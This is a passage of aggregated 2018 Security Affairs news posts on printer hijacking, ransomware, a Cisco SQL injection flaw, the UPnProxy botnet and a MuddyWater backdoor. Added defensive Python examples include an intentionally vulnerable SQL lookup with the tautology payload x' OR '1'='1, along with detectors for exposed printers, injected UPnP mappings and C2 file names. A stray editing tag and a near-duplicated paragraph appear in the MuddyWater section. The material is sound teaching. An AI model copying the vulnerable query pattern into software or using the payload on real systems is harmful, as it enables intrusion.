TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to compromise the vulnerable printers. PRET is a legitimate tool developed by researchers from Ruhr-Universität Bochum in Germany for testing purposes.

The case is very singular and raises the discussion about the importance of properly securing Internet-connected devices.

In this case, the attackers simply printed out a message, but vulnerable printers exposed online could be the entry points for attackers who, with further lateral movement, can compromise an entire network and access sensitive information.

Don’t forget that every device in your organization that is exposed online enlarges your attack surface.
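Port 9100 is the raw printing port the hacker searched Shodan for, and an accepted inbound connection to it from outside your own address space is the signal that a printer is exposed. As an added example, not part of the original post and unrelated to PRET, the Python below runs that detection over a few constructed firewall log lines in a simple key=value format and summarises which printers were reached from outside. The log format, the addresses and the list of printer ports (9100 raw, 515 LPD, 631 IPP) are assumptions for the demo; adapt the parser to your firewall's own format.

```python
import ipaddress
import re

# Ports used by raw printing (9100), LPD (515) and IPP (631).
PRINTER_PORTS = {9100, 515, 631}

# Address space treated as "ours" for this check. An explicit list is used instead of
# ipaddress's is_global, which also classifies documentation ranges such as
# 203.0.113.0/24 (used in the sample) as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample lines (not real logs) in an assumed key=value firewall format.
SAMPLE_LOG = """\
2018-11-30T10:01:12Z action=ACCEPT proto=TCP src=192.168.10.5 spt=50211 dst=192.168.10.40 dpt=9100
2018-11-30T10:02:40Z action=ACCEPT proto=TCP src=203.0.113.77 spt=41022 dst=192.168.10.40 dpt=9100
2018-11-30T10:02:41Z action=ACCEPT proto=TCP src=203.0.113.77 spt=41023 dst=192.168.10.41 dpt=9100
2018-11-30T10:03:05Z action=ACCEPT proto=TCP src=198.51.100.9 spt=55555 dst=192.168.10.40 dpt=631
2018-11-30T10:04:00Z action=DROP proto=TCP src=198.51.100.9 spt=55556 dst=192.168.10.42 dpt=9100
2018-11-30T10:05:00Z action=ACCEPT proto=TCP src=203.0.113.77 spt=41030 dst=192.168.10.50 dpt=443
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) proto=(?P<proto>\w+) "
    r"src=(?P<src>\S+) spt=\d+ dst=(?P<dst>\S+) dpt=(?P<dpt>\d+)$")


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def exposed_printer_sessions(log_text: str) -> list:
    """Return (timestamp, src, dst, port) for accepted connections to printer ports from
    addresses outside INTERNAL_NETS. Dropped connections are scanning noise and are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        port = int(m["dpt"])
        if m["action"] != "ACCEPT" or port not in PRINTER_PORTS:
            continue
        if not is_internal(m["src"]):
            hits.append((m["ts"], m["src"], m["dst"], port))
    return hits


def printers_reached_from_outside(log_text: str) -> dict:
    """Summarise the hits as {printer address: set of external source addresses}."""
    summary = {}
    for _, src, dst, _ in exposed_printer_sessions(log_text):
        summary.setdefault(dst, set()).add(src)
    return summary


if __name__ == "__main__":
    for printer, sources in sorted(printers_reached_from_outside(SAMPLE_LOG).items()):
        print(printer, sorted(sources))
```

Every printer that shows up in the summary is reachable from the Internet and should be moved behind the firewall or onto a print server; the DROP line in the sample is the kind of scan that precedes an incident like this one and is worth counting separately.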

Pierluigi Paganini

(Security Affairs – vulnerable printers, hacking)

The post Hacker hijacks printers worldwide to promote popular YouTube channel appeared first on Security Affairs.

Security Affairs: Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is over 700 meters long and spans the Moscow river, linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after the Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure, were infected with ransomware and the attackers requested payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00 local time, according to local news outlets.

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining to people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MKD removed the malware from its systems and on November 30 the cable car service resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, and a criminal case was opened into the hacker attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of San Francisco’s Municipal Railway, took the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.



Security Affairs: Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal:

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.



Security Affairs: Cisco addressed SQL Injection flaw in Cisco Prime License Manager

Cisco has released security updates to address a vulnerability in the web framework code of Cisco Prime License Manager that could be exploited by an attacker to execute arbitrary SQL queries.

Cisco has fixed a vulnerability in Cisco Prime License Manager that could be exploited by a remote unauthenticated attacker to execute arbitrary SQL queries.

The flaw is caused by the lack of proper validation of user-supplied input in SQL queries. The attacker could trigger the flaw by sending crafted HTTP POST requests containing malicious SQL statements to the vulnerable application.

“A vulnerability in the web framework code of Cisco Prime License Manager (PLM) could allow an unauthenticated, remote attacker to execute arbitrary SQL queries.” reads the advisory published by Cisco.

“The vulnerability is due to a lack of proper validation of user-supplied input in SQL queries. An attacker could exploit this vulnerability by sending crafted HTTP POST requests that contain malicious SQL statements to an affected application. A successful exploit could allow the attacker to modify and delete arbitrary data in the PLM database or gain shell access with the privileges of the postgres user.” 

The flaw was reported by Suhail Alaskar from Saudi Information Technology Company. The flaw affects Prime License Manager releases 11.0.1 and later; it impacts both standalone deployments of Cisco Prime License Manager and coresident deployments, where Prime License Manager is installed automatically as part of the installation of Cisco Unified Communications Manager and Cisco Unity Connection.

Cisco Unified Communications Manager and Cisco Unity Connection Releases 12.0 and later are not affected by this flaw as Cisco Prime License Manager is no longer included in these releases.

There are no workarounds that address the flaw; Cisco released the patch ciscocm.CSCvk30822_v1.0.k3.cop.sgn to fix it in Prime License Manager.

“This vulnerability is fixed in Cisco Prime License Manager Release patch ciscocm.CSCvk30822_v1.0.k3.cop.sgn.” continues the company. “The same COP file can be used with standalone deployments of Cisco Prime License Manager as well as with coresident deployments as part of Cisco Unified Communications Manager and Cisco Unity Connection and with all affected versions.” 

Cisco is not aware of attacks in the wild exploiting the flaw.
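The root cause Cisco describes, user-supplied input spliced into SQL text without validation, is the classic injection pattern, and the fix is the same in any web framework: bind the value as a parameter so it can never alter the statement. As an added example, not Cisco's code and not the PLM schema, the Python below puts the vulnerable lookup beside its parameterised form against an in-memory SQLite table and shows that a hostile POST parameter value returns every row from the first and nothing from the second. The table, the product names and the request parameter are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a licensing database (not Cisco PLM's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE licenses (id INTEGER PRIMARY KEY, product TEXT, seats INTEGER)")
    conn.executemany("INSERT INTO licenses (product, seats) VALUES (?, ?)",
                     [("CUCM", 500), ("Unity", 200), ("Emergency Responder", 50)])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, product: str) -> list:
    """The pattern behind the advisory: the POST parameter is concatenated into the SQL
    text, so the database parses attacker-controlled characters as part of the query."""
    sql = "SELECT id, product, seats FROM licenses WHERE product = '" + product + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn: sqlite3.Connection, product: str) -> list:
    """Parameterised form: the value is bound separately from the statement and cannot
    change its structure, whatever characters it contains."""
    sql = "SELECT id, product, seats FROM licenses WHERE product = ?"
    return conn.execute(sql, (product,)).fetchall()


def demo() -> dict:
    """Run both lookups with a normal value and with a textbook tautology as the value
    of the (hypothetical) 'product' POST parameter."""
    conn = make_db()
    hostile = "x' OR '1'='1"
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "CUCM"),
        "normal_fixed": lookup_fixed(conn, "CUCM"),
        "hostile_vulnerable": lookup_vulnerable(conn, hostile),  # condition is always true: all rows
        "hostile_fixed": lookup_fixed(conn, hostile),            # no product has that literal name
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Parameterisation closes the injection itself; the second half of Cisco's impact statement (shell access as the postgres user) is a reminder that the database account the web application logs in with should also be restricted to the tables and privileges it actually needs, so that a future bug in another code path cannot reach the operating system.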

Pierluigi Paganini

(Security Affairs – CISCO, SQL Injection)

The post Cisco addressed SQL Injection flaw in Cisco Prime License Manager appeared first on Security Affairs.



Security Affairs: ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

Over 270,000 connected devices run vulnerable implementations of UPnP, threat actors are attempting to recruit them in a multi-purpose botnet.

In April, Akamai reported that threat actors had compromised 65,000 home routers by exploiting vulnerabilities in Universal Plug’N’Play (UPnP); experts tracked the botnet as UPnProxy. Now the company has provided an update to its initial analysis revealing a disconcerting scenario: UPnProxy is still up and running.

The UPnP communication protocol is widely adopted even though it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to the Portable UPnP SDK were vulnerable to remote code execution through a single UDP packet, and that over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of the UPnP SOAP service to the internet.

By abusing the protocol, attackers can control the traffic in and out of the networks: UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices carrying malicious NAT injections that turn the routers into proxies; for this reason, the experts called the injected devices UPnProxy.

Experts recommend that users install router updates and patched firmware to mitigate the threat. According to Akamai, many UPnP vulnerabilities are still unpatched: out of a pool of 3.5 million potentially vulnerable routers, 277,000 were still open to UPnProxy, and 45,000 have been compromised.

“In Akamai’s previous research, we highlighted the possibility that attackers could leverage UPnProxy to exploit systems living behind the compromised router. Unfortunately, data from this recent batch of injections suggests this is exactly what’s happening.” Akamai notes.

“For home users, these attacks can lead to a number of complications, such as degraded service, malware infections, ransomware, and fraud. But for business users, these recent developments could mean systems that were never supposed to exist on the internet in the first place, could now be living there unknowingly, greatly increasing their chances of being compromised. Even more concerning, the services being exposed by this particular campaign have a history of exploitation related to crippling worms and ransomware campaigns targeting both Windows and Linux platforms.”

The latest campaign observed by Akamai, tracked as EternalSilence, is targeting millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed (CVE-2017-7494) exploits.

“Taking current disclosures and events into account, Akamai researchers believe that someone is attempting to compromise millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed exploits.” continues Akamai.

“Unfortunately, Akamai researchers are not able to see what happens after the injections are have occurred , they can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network.”

Akamai observed millions of successful injections that expose systems running SMB services, and its researchers assess that the attackers are leveraging the Eternal family of exploits from the leaked NSA arsenal.

Hackers hijacked some 45,113 routers, which together expose 1.7 million unique machines to the attackers.

“Additionally, there is no way to tell if EternalBlue or EternalRed was used to successfully compromise the exposed machine. However, if only a fraction of the potentially exposed systems were successfully compromised and fell into the hands of the attackers, the situation would quickly turn from bad to worse,” states Akamai.

According to the experts, the attackers are opportunistic: they either scan the Internet for SSDP and pivot to the TCP UPnP daemons, or target a set of devices that use static ports (TCP/2048) and paths (/etc/linuxigd/gatedesc.xml) for their UPnP daemons.
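A defender checking a router for this kind of injection queries the same UPnP interface the attackers use. The following audit is an added example, not code from the article or from Akamai's research: it parses the device description (the article's example path is /etc/linuxigd/gatedesc.xml on TCP/2048) to find the WANIPConnection control URL, walks the NAT table with GetGenericPortMappingEntry, and flags mappings that forward to a host outside the LAN (the relay behaviour that gives UPnProxy its name) or to SMB ports 139/445 (the services the EternalSilence injections expose). The LAN range, the URLs and the XML table below are constructed assumptions so that the audit runs offline.

```python
"""Audit a UPnP IGD router's NAT table for UPnProxy-style injected mappings."""
import ipaddress
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple
from urllib.parse import urljoin

DEVICE_NS = "{urn:schemas-upnp-org:device-1-0}"
SOAP_NS = "{http://schemas.xmlsoap.org/soap/envelope/}"
WANIP_PREFIX = "urn:schemas-upnp-org:service:WANIPConnection:"
WANIP = WANIP_PREFIX + "1"
SMB_PORTS = {139, 445}  # what the EternalSilence injections push onto the internet


@dataclass
class PortMapping:
    external_port: int
    protocol: str
    internal_client: str
    internal_port: int
    description: str


def find_control_url(description_xml: str, base_url: str) -> Optional[str]:
    """Locate the WANIPConnection control URL inside a device description (e.g. gatedesc.xml)."""
    root = ET.fromstring(description_xml)
    for svc in root.iter(DEVICE_NS + "service"):
        if svc.findtext(DEVICE_NS + "serviceType", "").startswith(WANIP_PREFIX):
            return urljoin(base_url, svc.findtext(DEVICE_NS + "controlURL", ""))
    return None


def mapping_request(index: int) -> str:
    """SOAP body for GetGenericPortMappingEntry: one NAT table row per call."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:GetGenericPortMappingEntry xmlns:u="{WANIP}">'
        f"<NewPortMappingIndex>{index}</NewPortMappingIndex>"
        "</u:GetGenericPortMappingEntry></s:Body></s:Envelope>"
    )


def soap_fetch(control_url: str, index: int, timeout: float = 5.0) -> str:
    """POST to a live router. A SOAP fault arrives as HTTP 500; its body is returned as well."""
    req = urllib.request.Request(
        control_url, data=mapping_request(index).encode(), method="POST",
        headers={"Content-Type": 'text/xml; charset="utf-8"',
                 "SOAPAction": f'"{WANIP}#GetGenericPortMappingEntry"'})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def parse_mapping(response_xml: str) -> Optional[PortMapping]:
    """None on a SOAP fault, which the router returns once the index runs past the table."""
    root = ET.fromstring(response_xml)
    if root.find(".//" + SOAP_NS + "Fault") is not None:
        return None

    def text(tag: str) -> str:  # argument elements are unqualified in the response
        return (root.findtext(".//" + tag) or "").strip()

    return PortMapping(int(text("NewExternalPort")), text("NewProtocol"),
                       text("NewInternalClient"), int(text("NewInternalPort")),
                       text("NewPortMappingDescription"))


def findings_for(m: PortMapping, lan: ipaddress.IPv4Network) -> List[str]:
    """A legitimate mapping points at a LAN host; injected ones point elsewhere or at SMB."""
    try:
        target = ipaddress.ip_address(m.internal_client)
    except ValueError:
        return ["internal client is not an IP address"]
    issues = []
    if target not in lan:
        issues.append(f"forwards {m.protocol}/{m.external_port} to {m.internal_client}, outside {lan}")
    if m.internal_port in SMB_PORTS:
        issues.append(f"exposes SMB port {m.internal_port} on {m.internal_client} to the internet")
    return issues


def audit_mappings(fetch: Callable[[int], str], lan_cidr: str) -> List[Tuple[PortMapping, List[str]]]:
    """Walk the mapping table until the first fault; return only rows with findings."""
    lan = ipaddress.ip_network(lan_cidr)
    flagged, index = [], 0
    while (mapping := parse_mapping(fetch(index))) is not None:
        issues = findings_for(mapping, lan)
        if issues:
            flagged.append((mapping, issues))
        index += 1
    return flagged


# Constructed samples (assumed layout, not captured from a real device).
SAMPLE_DESCRIPTION = (
    '<root xmlns="urn:schemas-upnp-org:device-1-0"><device><deviceList><device><deviceList>'
    f"<device><serviceList><service><serviceType>{WANIP}</serviceType>"
    "<controlURL>/upnp/control/WANIPConn1</controlURL></service></serviceList>"
    "</device></deviceList></device></deviceList></device></root>"
)
SAMPLE_FAULT = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
                "<s:Fault><faultcode>s:Client</faultcode></s:Fault></s:Body></s:Envelope>")


def _row(ext: int, proto: str, client: str, port: int, desc: str) -> str:
    return ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
            f'<u:GetGenericPortMappingEntryResponse xmlns:u="{WANIP}">'
            f"<NewExternalPort>{ext}</NewExternalPort><NewProtocol>{proto}</NewProtocol>"
            f"<NewInternalClient>{client}</NewInternalClient><NewInternalPort>{port}</NewInternalPort>"
            f"<NewPortMappingDescription>{desc}</NewPortMappingDescription>"
            "</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>")


SAMPLE_TABLE = [
    _row(32400, "TCP", "192.168.1.10", 32400, "media server"),  # ordinary user mapping
    _row(47925, "TCP", "192.168.1.23", 445, "svc"),              # SMB pushed onto the internet
    _row(8080, "TCP", "203.0.113.5", 8080, "relay"),             # router turned into a proxy
]


def demo_fetch(index: int) -> str:
    """Stand-in for lambda i: soap_fetch(control_url, i) that serves the constructed table."""
    return SAMPLE_TABLE[index] if index < len(SAMPLE_TABLE) else SAMPLE_FAULT


if __name__ == "__main__":
    url = find_control_url(SAMPLE_DESCRIPTION, "http://192.168.1.1:2048/etc/linuxigd/gatedesc.xml")
    print("control URL:", url)
    for mapping, issues in audit_mappings(demo_fetch, "192.168.1.0/24"):
        print(mapping, *issues, sep="\n  ")
```

Against a real gateway, fetch the description XML over HTTP, pass its URL to find_control_url, and hand `lambda i: soap_fetch(url, i)` to audit_mappings with the LAN's real CIDR; a router that exposes this interface on its WAN side is vulnerable regardless of what the table contains, so the first finding is the open port itself.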

“Criminals are clever, and will take any advantage they can get when it comes to exploiting systems and services. So, while it is unfortunate to see UPnProxy being actively leveraged to attack systems previously shielded behind the NAT, it was bound to happen eventually.” concludes Akamai. “That these attacks likely leverage two well-known vulnerabilities, which have been patched for some time, should come as no surprise.”

Pierluigi Paganini

(Security Affairs – UPnProxy, NSA hacking tools)

The post ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools appeared first on Security Affairs.




Security Affairs: MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation has used its ATT&CK framework to evaluate enterprise security products from several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products on their ability to detect advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principal cybersecurity engineer at MITRE.

Duff explained that MITRE adopts a transparent methodology and knowledge base that makes the results obtained with the service easy to interpret.

ATT&CK framework

In the first round, MITRE evaluated products against a case study emulating the APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group that operates under the control of China’s Ministry of State Security. The group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, it appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.

The first ATT&CK evaluations conducted by MITRE assessed the ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the techniques used by the APT3 cyber espionage group.

The tests focus on a product’s ability to detect the malicious activity threat actors typically carry out once they have compromised a system in the organization. It is important to highlight that the ATT&CK evaluations do not assign scores to each product; they are not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with the vendors during the evaluations and shared the results with them.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the vendors above, which signed up before the June 30, 2018 cohort deadline.

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.




New PowerShell-based Backdoor points to MuddyWater

Security researchers at Trend Micro recently discovered a PowerShell-based backdoor that resembles malware used by the MuddyWater threat actor.

Malware researchers at Trend Micro have discovered a PowerShell-based backdoor that closely resembles malware used by the MuddyWater APT group.

The first MuddyWater campaign was observed in late 2017, when researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ because of the confusion in attributing the attacks, which took place between February and October 2017 and targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The threat actors used a PowerShell-based first-stage backdoor named POWERSTATS; over time they changed tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group (another name used by experts to track MuddyWater), targeting Asia and the Middle East from January 2018 to March 2018.
</gr_repl
ace>

<gr_replace lines="2604" cat="clarify" orig="In the latest attacks">
In the latest attacks detected by Trend Micro, the threat actors used TTPs consistent with MuddyWater; the malicious code was uploaded to VirusTotal from Turkey. The attackers used decoy documents that drop a new PowerShell backdoor similar to MuddyWater’s POWERSTATS malware.

In the latest attacks detected by Trend Micro, threat actors used TTPs compatible with MuddyWater, the malicious code was uploaded to Virus Total from Turkey. The attackers used decoy documents that would drop a new PowerShell backdoor that is similar to MuddyWater’s POWERSTATS malware.

“These documents are named Raport.doc or Gizli Raport.doc (titles mean “Report” or “Secret Report” in Turkish) and maliyeraporti (Gizli Bilgisi).doc (“finance (Confidential Information)” in Turkish) — all of which were uploaded to Virus Total from Turkey.” states Trend Micro.

“Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor. But, unlike previous incidents using POWERSTATS, the command and control (C&C) communication and data exfiltration in this case is done by using the API of a cloud file hosting provider.”

The new backdoor uses the API of a cloud file hosting provider for command and control (C&C) communication and data exfiltration.

The weaponized documents contain images with blurry logos of Turkish government organizations, which lure victims into enabling macros to display the document properly.

MuddyWater

The macros contain strings encoded in base52, an uncommon technique that MuddyWater used in past attacks. Once enabled, the macros drop a .dll file (with PowerShell code embedded) and a .reg file into the %temp% directory.

The PowerShell code has several layers of obfuscation. The backdoor first collects system information and concatenates various pieces of it (OS name, domain name, user name, IP address) into one long string.

For communication, the malware uses files named <md5(hard disk serial number)> with various extensions that indicate the purpose of each file:

  • .cmd – text file with a command to execute
  • .reg – system info as generated by myinfo() function, see screenshot above
  • .prc – output of the executed .cmd file, stored on local machine only
  • .res – output of the executed .cmd file, stored on cloud storage

“In both the older version of the MuddyWater backdoor and this recent backdoor, these files are used as an asynchronous mechanism instead of connecting directly to the machine and issuing a command.” continues Trend Micro.

“The malware operator leaves a command to execute in a .cmd file, and comes back later to retrieve the .res files containing the result of the issued command.”

The malware supports various commands including file upload, persistence removal, exit, file download, and command execution.
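The file naming described above gives defenders a host-side signal that does not depend on seeing the cloud traffic. The detection logic below is an added example, not Trend Micro's code: it groups file names from a sync-folder listing or file-event log by 32-hex stem and the four channel extensions (.cmd, .reg, .prc, .res), treats a stem carrying two or more of them as suspicious, and optionally checks the stem against the MD5 of the local disk serial. The file names and the serial are constructed, and hashing the serial as UTF-8 text is an assumption the article does not state.

```python
"""Flag the <md5(disk serial)>.{cmd,reg,prc,res} file-based C2 channel in a file listing."""
import hashlib
import ntpath
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set

# Roles of the four extensions as described in the Trend Micro analysis.
CHANNEL_EXTENSIONS = {
    "cmd": "command to execute",
    "reg": "system info",
    "prc": "command output (local only)",
    "res": "command output (uploaded)",
}
CHANNEL_FILE = re.compile(r"^(?P<stem>[0-9a-f]{32})\.(?P<ext>cmd|reg|prc|res)$", re.IGNORECASE)


def channel_stem(disk_serial: str) -> str:
    """Hex MD5 of the disk serial; UTF-8 encoding before hashing is an assumption."""
    return hashlib.md5(disk_serial.encode("utf-8")).hexdigest()


def group_channel_files(names: Iterable[str]) -> Dict[str, Set[str]]:
    """Map each candidate stem to the set of channel extensions seen with it."""
    groups: Dict[str, Set[str]] = defaultdict(set)
    for name in names:
        match = CHANNEL_FILE.match(ntpath.basename(name))  # handles both / and \ separators
        if match:
            groups[match.group("stem").lower()].add(match.group("ext").lower())
    return dict(groups)


def suspicious_stems(names: Iterable[str], local_disk_serial: Optional[str] = None,
                     min_extensions: int = 2) -> List[dict]:
    """A stem is suspicious when several channel extensions share it, or when it is
    exactly the MD5 of this host's disk serial (a single stray .res file with a random
    hex name is not enough on its own)."""
    expected = channel_stem(local_disk_serial) if local_disk_serial else None
    hits = []
    for stem, exts in group_channel_files(names).items():
        matches_host = stem == expected
        if len(exts) >= min_extensions or matches_host:
            hits.append({
                "stem": stem,
                "extensions": sorted(exts),
                "roles": [CHANNEL_EXTENSIONS[e] for e in sorted(exts)],
                "matches_local_disk_serial": matches_host,
            })
    return hits


# Constructed sample: a fake disk serial and a file listing as a sync client or EDR might log it.
SAMPLE_SERIAL = "WD-WCC4N0123456"
_STEM = channel_stem(SAMPLE_SERIAL)
SAMPLE_LISTING = [
    f"C:\\Users\\user\\CloudSync\\{_STEM}.reg",
    f"C:\\Users\\user\\CloudSync\\{_STEM}.cmd",
    f"C:\\Users\\user\\AppData\\Local\\Temp\\{_STEM}.prc",
    "C:\\Users\\user\\CloudSync\\report.docx",
    "C:\\Users\\user\\CloudSync\\0123456789abcdef0123456789abcdef.res",  # unrelated stem, one file
]

if __name__ == "__main__":
    for hit in suspicious_stems(SAMPLE_LISTING, SAMPLE_SERIAL):
        print(hit)
```

On a real host, feed it the file names from the cloud client's sync directory and %temp%, and read the disk serial from WMI (Win32_DiskDrive.SerialNumber) before hashing; the exact string the malware hashes may differ in whitespace or case, so treat the serial check as corroboration and the multi-extension grouping as the primary rule.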

Experts concluded that the attacks aimed at Turkish government organizations related to the finance and energy sectors, which MuddyWater also hit in the past.

“This is yet another similarity with previous MuddyWater campaigns, which were known to have targeted multiple Turkish government entities.” concludes Trend Micro.

“If the group is responsible for this new backdoor, it shows how they are improving and experimenting with new tools,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – MuddyWater, backdoor)

 

The post New PowerShell-based Backdoor points to MuddyWater appeared first on Security Affairs.

327 million Marriott guests affected in Starwood Data Breach

Starwood Data Breach – Hackers had access to the guest reservation system of the Marriott-owned Starwood since 2014 and copied and encrypted the information.

Marriott International is the latest victim in a long string of data breaches: the company announced that hackers compromised the guest reservation database of its Starwood hotels subsidiary and stole personal details of up to about 500 million guests.

“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.” reads the data breach notification published by Marriott.

“For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.”

This is one of the largest data breaches on record and the biggest in the hospitality industry.

Marriott International bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

